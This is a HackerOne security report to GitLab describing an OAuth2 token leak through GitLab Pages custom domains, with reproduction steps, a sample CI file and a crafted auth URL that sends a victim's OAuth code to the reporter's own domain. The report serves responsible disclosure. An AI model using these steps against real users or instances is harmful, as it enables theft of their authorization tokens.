Oauth2 and Gitlab-Page problem
HackerOne report #1035398 by ledz1996 on 2020-11-16, assigned to @dcouture:
Report | Attachments | How To Reproduce
Report
Summary
There is problem with the current existing Gitlab-Pages and Gitlab
- Stealing Oauth2 Token from gitlab-pages
For the first problem, It is very simple to add a A record pointing your custom domain to your designated host. You just have to do the verification step to get it done.
Subsequent request to the following request will return an oauth2 token for the designated domain:
https://projects.gitlab.io/auth?domain=http://test123.testforgitlab.xyz&state=DePkz40iQTvpMnc_WvgsdA==
Steps to reproduce
- Create a Project and a .gitlab-ci.yml to use Gitlab-pages
### This file is a template, and might need editing before it works on your project.
### Full project: https://gitlab.com/pages/plain-html
pages:
stage: deploy
script:
- mkdir .public
- echo "1234" > .public/hehe.html
- cp -r * .public
- mv .public public
artifacts:
paths:
- public
only:
- master
- Configure custom domain for pages and do the verification step but instead of adding
CNAMEto <user>.gitlab.io, you change it to your address withARecord. I usedtest123.testforgitlab.xyzas my customdomain
3. Login as another user and navigate to the following URL
https://projects.gitlab.io/auth?domain=http://test123.testforgitlab.xyz&state=DePkz40iQTvpMnc_WvgsdA==
- Without user's consent, later on a request sent to
http://test123.testforgitlab.xyzwith Oauth2 Code, this code is exactly the same as the code for authorizing Gitlab-Pages as seen in Burp. This is the main issue.
Mitigations
For the first problem, I think you should separate the token for Oauth2 Gitlab and Oauth2 Gitlab-pages. For example, the Oauth2 generated for the project.gitlab.io should be different to user's gitlab-pages.
Impact
Leakage of tokens, Misleading authorization message.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: